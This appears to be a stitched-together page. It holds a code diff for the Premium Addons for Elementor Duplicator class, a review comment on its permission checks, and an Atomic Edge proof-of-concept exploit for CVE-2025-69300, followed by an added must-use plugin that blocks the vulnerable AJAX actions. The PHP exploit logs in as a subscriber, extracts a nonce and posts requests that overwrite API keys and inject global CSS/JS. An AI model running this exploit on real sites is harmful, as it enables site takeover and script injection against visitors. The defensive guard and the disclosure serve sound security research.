-			foreach ( $post_meta_keys as $meta_key ) {
-
-				$meta_values = get_post_custom_values( $meta_key, $old_id );
-
-				foreach ( $meta_values as $meta_value ) {
-
-					$meta_value = maybe_unserialize( $meta_value );
-
-					update_post_meta( $new_id, $meta_key, wp_slash( $meta_value ) );
-
-				}
-			}
-		}
-	}
-
-
-	/**
-	 * Creates and returns an instance of the class
-	 *
-	 * @since 3.20.9
-	 * @access public
-	 *
-	 * @return object
-	 */
-	public static function get_instance() {
-
-		if ( ! isset( self::$instance ) ) {
-
-			self::$instance = new self();
-
-		}
-
-		return self::$instance;
-	}
-}
+<?php
+/**
+ * PA Duplicator.
+ */
+
+namespace PremiumAddonsAdminIncludes;
+
+use ElementorCoreFilesCSSPost as Post_CSS;
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit();
+}
+
+/**
+ * Class Duplicator
+ */
+class Duplicator {
+
+	/**
+	 * PA Duplicator action.
+	 */
+	const DUPLICATE_ACTION = 'pa_duplicator';
+
+	/**
+	 * Class object
+	 *
+	 * @var instance
+	 */
+	private static $instance = null;
+
+	/**
+	 * Constructor for the class
+	 */
+	public function __construct() {
+
+		add_action( 'admin_action_' . self::DUPLICATE_ACTION, array( $this, 'duplicate_post' ) );
+
+		add_filter( 'post_row_actions', array( $this, 'add_duplicator_actions' ), 10, 2 );
+
+		add_filter( 'page_row_actions', array( $this, 'add_duplicator_actions' ), 10, 2 );
+	}
+
+	/**
+	 * Add Duplicator Actions
+	 *
+	 * Add duplicator action links to posts/pages
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @param array  $actions row actions.
+	 * @param object $post WP_Post.
+	 * @return array
+	 */
+	public function add_duplicator_actions( $actions, $post ) {
+
+		if ( current_user_can( 'edit_others_posts' ) && post_type_supports( $post->post_type, 'elementor' ) ) {
+
+			$actions[ self::DUPLICATE_ACTION ] = sprintf(
+				'<a href="%1$s" title="%2$s"><span class="screen-reader-text">%2$s</span>%3$s</a>',
+				esc_url( self::get_duplicate_url( $post->ID ) ),
+				/* translators: %s: Post Title */
+				sprintf( esc_attr__( 'Duplicate - %s', 'premium-addons-for-elementor' ), esc_attr( $post->post_title ) ),
+				__( 'PA Duplicate', 'premium-addons-for-elementor' )
+			);
+
+		}
+
+		return $actions;
+	}
+
+	/**
+	 * Get duplicate url
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @param integer $post_id item ID.
+	 * @return string
+	 */
+	public static function get_duplicate_url( $post_id ) {
+
+		$paged = ( get_query_var( 'paged' ) ) ? get_query_var( 'paged' ) : 1;
+
+		return wp_nonce_url(
+			add_query_arg(
+				array(
+					'action'  => self::DUPLICATE_ACTION,
+					'post_id' => $post_id,
+					'paged'   => $paged,
+				),
+				admin_url( 'admin.php' )
+			),
+			self::DUPLICATE_ACTION
+		);
+	}
+
+	/**
+	 * Duplicate required post/page
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @return void
+	 */
+	public function duplicate_post() {
+
+		$nonce   = isset( $_GET['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ) : '';
+		$post_id = isset( $_GET['post_id'] ) ? absint( $_GET['post_id'] ) : 0;
+		$paged   = isset( $_GET['paged'] ) ? absint( $_GET['paged'] ) : 1;
+
+		if ( ! current_user_can( 'edit_post', $post_id ) ) {
+			return;
+		}
+
+		if ( ! wp_verify_nonce( $nonce, self::DUPLICATE_ACTION ) ) {
+			return;
+		}
+
+		$post = get_post( $post_id );
+		if ( is_null( $post ) ) {
+			return;
+		}
+
+		$post = sanitize_post( $post, 'db' );
+
+		$duplicated_post_id = self::insert_post( $post );
+
+		$redirect = add_query_arg(
+			array(
+				'post_type' => $post->post_type,
+				'paged'     => $paged,
+			),
+			admin_url( 'edit.php' )
+		);
+
+		if ( ! is_wp_error( $duplicated_post_id ) ) {
+
+			self::duplicate_post_taxonomies( $post, $duplicated_post_id );
+			self::duplicate_post_meta_data( $post_id, $duplicated_post_id );
+
+			$css = Post_CSS::create( $duplicated_post_id );
+			$css->update();
+
+		}
+
+		wp_safe_redirect( $redirect );
+		die();
+	}
+
+	/**
+	 * Duplicate required post/page
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @param object $post WP_Post.
+	 */
+	protected static function insert_post( $post ) {
+
+		$current_user = wp_get_current_user();
+
+		$post_meta = get_post_meta( $post->ID );
+
+		$duplicated_post_args = array(
+			'post_status'    => 'draft',
+			'post_type'      => $post->post_type,
+			'post_parent'    => $post->post_parent,
+			'post_content'   => $post->post_content,
+			'menu_order'     => $post->menu_order,
+			'ping_status'    => $post->ping_status,
+			'post_excerpt'   => $post->post_excerpt,
+			'post_password'  => $post->post_password,
+			'comment_status' => $post->comment_status,
+			'to_ping'        => $post->to_ping,
+			'post_author'    => $current_user->ID,
+			'post_title'     => sprintf(
+				/* translators: 1: Post Title, 2: Post ID */
+				__( '%1$s - Duplicate - [#%2$d]', 'premium-addons-for-elementor' ),
+				$post->post_title,
+				$post->ID
+			),
+		);
+
+		if ( isset( $post_meta['_elementor_edit_mode'][0] ) ) {
+
+			$data = array(
+				'meta_input' => array(
+					'_elementor_edit_mode'     => $post_meta['_elementor_edit_mode'][0],
+					'_elementor_template_type' => $post_meta['_elementor_template_type'][0],
+				),
+			);
+
+			$duplicated_post_args = array_merge( $duplicated_post_args, $data );
+
+		}
+
+		return wp_insert_post( $duplicated_post_args );
+	}
+
+	/**
+	 * Add post taxonomies to the cloned version
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @param object  $post WP_Post.
+	 * @param integer $id item ID.
+	 */
+	public static function duplicate_post_taxonomies( $post, $id ) {
+
+		$taxonomies = array_map( 'sanitize_text_field', get_object_taxonomies( $post->post_type ) );
+
+		if ( ! empty( $taxonomies ) && is_array( $taxonomies ) ) {
+			foreach ( $taxonomies as $taxonomy ) {
+				$terms = wp_get_object_terms( $post->ID, $taxonomy, array( 'fields' => 'slugs' ) );
+				wp_set_object_terms( $id, $terms, $taxonomy, false );
+			}
+		}
+	}
+
+	/**
+	 * Add post meta data to the cloned version
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @param object  $post WP_Post.
+	 * @param integer $id item ID.
+	 */
+	public static function duplicate_post_meta_data( $old_id, $new_id ) {
+
+		$post_meta_keys = get_post_custom_keys( $old_id );
+
+		if ( ! empty(
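Review bot: duplicate_post() enforces current_user_can( 'edit_post', $post_id ), but add_duplicator_actions() only offers the link to users with edit_others_posts, so the handler accepts a wider set of users than the UI intends. The handler is the enforcement point and should check the same capability, and confirm the user may create posts of that type, since insert_post() calls wp_insert_post() with no further check. Both failure branches just `return;`, which lets admin.php carry on silently; wp_die() with a 403, or check_admin_referer( self::DUPLICATE_ACTION ) for the nonce, would make the rejection explicit. In insert_post(), $post_meta['_elementor_template_type'][0] is read after an isset() on _elementor_edit_mode only, so it needs its own guard. The docblock on duplicate_post_meta_data() documents $post and $id while the signature takes $old_id and $new_id.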

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69300 - Premium Addons for Elementor <= 4.11.63 - Missing Authorization to Authenticated (Subscriber+) Settings Update

/**
 * Proof of Concept for CVE-2025-69300
 * Demonstrates unauthorized plugin settings modification by Subscriber-level users
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_password';

// Step 1: Authenticate as Subscriber to obtain WordPress cookies and nonce
function authenticate_and_get_nonce($target_url, $username, $password) {
    $login_url = $target_url . '/wp-login.php';
    $admin_url = $target_url . '/wp-admin/';
    
    // Initialize session
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    
    // Get login page to retrieve nonce
    curl_setopt($ch, CURLOPT_URL, $login_url);
    $response = curl_exec($ch);
    
    // Extract login nonce (WordPress uses 'log' and 'pwd' parameters)
    // Note: Modern WordPress may require additional nonce extraction
    
    // Perform login
    $post_data = http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $admin_url,
        'testcookie' => '1'
    ]);
    
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    $response = curl_exec($ch);
    
    // Navigate to admin page to get AJAX nonce
    curl_setopt($ch, CURLOPT_URL, $admin_url);
    curl_setopt($ch, CURLOPT_POST, false);
    $response = curl_exec($ch);
    
    // Extract nonce from page (simplified - actual implementation would parse HTML)
    // Premium Addons nonce is typically available in page scripts
    preg_match('/"pa-settings-tab"\s*:\s*"([a-f0-9]+)"/', $response, $matches);
    $nonce = $matches[1] ?? '';
    
    curl_close($ch);
    return $nonce;
}

// Step 2: Exploit missing authorization to modify plugin settings
function exploit_settings_update($target_url, $nonce) {
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $ajax_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_POST, true);
    
    // Example 1: Modify integration settings
    $integration_data = [
        'action' => 'pa_save_integration',
        'security' => $nonce,
        'fields' => json_encode([
            'premium-map-api' => 'ATTACKER_CONTROLLED_API_KEY',
            'premium-youtube-api' => 'ATTACKER_YT_API_KEY',
            'premium-mailchimp-api' => 'ATTACKER_MAILCHIMP_KEY'
        ])
    ];
    
    curl_setopt($ch, CURLOPT_POSTFIELDS, $integration_data);
    $response = curl_exec($ch);
    echo "Integration Settings Update Response: " . $response . "\n";
    
    // Example 2: Modify global CSS/JS settings
    $css_js_data = [
        'action' => 'pa_save_global_css_js',
        'security' => $nonce,
        'fields' => json_encode([
            'premium-global-css' => '/* Malicious CSS injection */',
            'premium-global-js' => '// Malicious JavaScript'
        ])
    ];
    
    curl_setopt($ch, CURLOPT_POSTFIELDS, $css_js_data);
    $response = curl_exec($ch);
    echo "Global CSS/JS Update Response: " . $response . "\n";
    
    curl_close($ch);
}

// Main execution
if ($target_url && $username && $password) {
    echo "[+] Starting exploitation of CVE-2025-69300\n";
    echo "[+] Target: " . $target_url . "\n";
    
    $nonce = authenticate_and_get_nonce($target_url, $username, $password);
    
    if ($nonce) {
        echo "[+] Obtained nonce: " . $nonce . "\n";
        echo "[+] Attempting unauthorized settings modification...\n";
        exploit_settings_update($target_url, $nonce);
        echo "[+] Exploitation attempt completed\n";
    } else {
        echo "[-] Failed to obtain nonce\n";
    }
} else {
    echo "Please configure target_url, username, and password variables\n";
}
?>
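The defensive counterpart to the requests above, as an added example that is not part of the original page or the plugin's own code: a must-use plugin that enforces the `manage_options` check on the four AJAX actions named in the analysis, for sites that cannot yet update to 4.11.64. The file name, the `pa_guard_*` identifiers and the log format are assumptions; the action names are taken from this page.

```php
<?php
/**
 * Plugin Name: PA settings AJAX capability guard (example)
 *
 * Added example, not vendor code. Place in wp-content/mu-plugins/ so it loads
 * before regular plugins. Action names are the ones listed in this page's
 * analysis; verify them against the installed plugin version.
 */

// AJAX actions the analysis names as missing a capability check.
const PA_GUARD_ACTIONS = array(
	'pa_save_integration',
	'pa_save_google_sheets',
	'pa_save_global_css_js',
	'pa_disable_mini_cart_template',
);

/**
 * Reject the request unless the caller can manage options.
 * Hooked at priority 0 so it runs before the plugin's handler (default 10).
 */
function pa_guard_require_manage_options() {
	if ( current_user_can( 'manage_options' ) ) {
		return; // Administrators fall through to the real handler.
	}

	// Leave a trail for detection: which action, which account, which source.
	error_log( sprintf(
		'pa-guard: blocked action=%s user_id=%d ip=%s',
		isset( $_REQUEST['action'] ) ? sanitize_key( wp_unslash( $_REQUEST['action'] ) ) : '',
		get_current_user_id(),
		isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : ''
	) );

	// wp_send_json_error() ends the request, so the plugin handler never runs.
	wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
}

foreach ( PA_GUARD_ACTIONS as $pa_guard_action ) {
	add_action( 'wp_ajax_' . $pa_guard_action, 'pa_guard_require_manage_options', 0 );
}
```

Entries beginning with `pa-guard: blocked` in the PHP error log point to low-privilege accounts that attempted a settings change and are worth reviewing alongside any recent changes to the plugin's stored options.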
